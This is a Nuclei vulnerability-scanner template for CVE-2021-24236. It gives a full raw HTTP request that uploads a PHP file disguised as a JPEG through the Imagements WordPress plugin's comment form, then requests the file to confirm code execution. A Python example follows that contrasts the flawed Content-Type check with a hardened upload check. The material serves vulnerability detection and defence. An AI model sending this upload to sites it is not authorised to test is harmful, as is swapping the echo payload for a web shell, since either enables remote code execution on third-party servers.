nuclei-templates/cves/2021/CVE-2021-24236.yaml

id: CVE-2021-24236

info:
  name: WordPress Plugin Imagements 1.2.5 - Unauthenticated Arbitrary File Upload
  author: pussycat0x
  severity: critical
  description: |
    The Imagements WordPress plugin through 1.2.5 allows images to be uploaded in comments, but only checks the Content-Type in the request to forbid dangerous files. This allows unauthenticated attackers to upload arbitrary files by using a valid image Content-Type along with a PHP filename and code, leading to RCE.
  reference:
    - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
    - https://wordpress.org/plugins/imagements/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24236
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24236
    cwe-id: CWE-434
  tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,upload,wordpress,wp-plugin

variables:
  php: "{{to_lower('{{randstr}}')}}.php"
  post: "1"

requests:
  - raw:
      - |
        POST /wp-comments-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="author"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="email"

        {{randstr}}@email.com
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="url"


        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="checkbox"

        yes
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="naam"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="image"; filename="{{php}}"
        Content-Type: image/jpeg

        <?php echo 'CVE-2021-24236'; ?>
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="submit"

        Post Comment
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_post_ID"

        {{post}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_parent"

        0
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--

      - |
        GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2021-24236"
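As an added example (not part of the nuclei template or the Imagements plugin), the multipart comment submission the template sends is rebuilt in Python and run through the Content-Type-only check the advisory describes beside a hardened check that decides on a filename-extension allowlist plus the file's magic bytes; the part Content-Type header is client-controlled, so it proves nothing. The helper names `comment_body`, `weak_check`, `hardened_check` and `evaluate` are assumptions, and the sample bodies are constructed.

```python
import re

BOUNDARY = "----WebKitFormBoundaryIYl2Oz8ptq5OMtbU"  # boundary reused from the template
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
MAGIC = {b"\xff\xd8\xff": "jpeg", b"\x89PNG\r\n\x1a\n": "png", b"GIF8": "gif"}

def build_part(name, data, filename=None, ctype=None):
    """One multipart/form-data part in the shape the template sends (constructed)."""
    disp = f'form-data; name="{name}"' + (f'; filename="{filename}"' if filename else "")
    head = f"Content-Disposition: {disp}\r\n" + (f"Content-Type: {ctype}\r\n" if ctype else "")
    return f"--{BOUNDARY}\r\n{head}\r\n".encode() + data + b"\r\n"

def comment_body(image_name, image_bytes):
    """Constructed comment submission mirroring the template's fields."""
    return (build_part("comment", b"nice post") + build_part("comment_post_ID", b"1")
            + build_part("image", image_bytes, image_name, "image/jpeg")
            + f"--{BOUNDARY}--\r\n".encode())

def parse_multipart(body, boundary=BOUNDARY):
    """Split a multipart body into (lower-cased header dict, raw data) tuples."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):  # closing delimiter reached
            break
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {k.strip().lower(): v.strip() for k, _, v in
                   (ln.decode().partition(":") for ln in head.strip().split(b"\r\n"))}
        parts.append((headers, data.removesuffix(b"\r\n")))
    return parts

def weak_check(headers):
    """The check the advisory describes: trusts the client-supplied part Content-Type."""
    return headers.get("content-type", "").startswith("image/")

def hardened_check(headers, data):
    """Decide on an extension allowlist plus magic bytes; the header is ignored."""
    m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    ext = m.group(1).rsplit(".", 1)[-1].lower() if m and "." in m.group(1) else ""
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    kind = next((k for sig, k in MAGIC.items() if data.startswith(sig)), None)
    return kind is not None, kind or "content is not a recognised image"

def evaluate(body):
    """Apply both checks to the file part: (weak_accepts, hardened_accepts, reason)."""
    for headers, data in parse_multipart(body):
        if "filename=" in headers.get("content-disposition", ""):
            ok, reason = hardened_check(headers, data)
            return weak_check(headers), ok, reason
    return False, False, "no file part"
```

The weak check accepts the template's `.php` upload because its part says `image/jpeg`; the hardened check rejects it on extension, and also rejects PHP content hiding behind a `.jpg` name.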